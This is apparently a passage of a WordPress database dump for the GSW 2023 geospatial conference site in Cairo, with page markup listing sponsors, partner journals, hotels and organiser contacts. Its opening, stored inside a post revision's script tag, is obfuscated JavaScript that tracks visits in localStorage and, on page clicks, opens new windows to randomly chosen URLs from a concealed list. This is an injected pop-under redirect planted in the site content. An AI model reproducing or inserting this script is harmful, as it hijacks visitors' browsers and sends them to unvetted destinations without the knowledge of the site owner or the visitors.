_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:39:05','2023-08-30 17:39:05','',3066,'https://gsw2023.com/?p=5445',0,'revision','',0),
(5448,1,'2023-09-16 22:41:12','2023-09-01 04:31:32','','GSW’2023 Conference Agenda','','publish','closed','closed','','gsw2023-conference-agenda','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=5448',14,'nav_menu_item','',0),
(5449,1,'2023-09-04 10:44:50','2023-09-04 10:44:50','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK 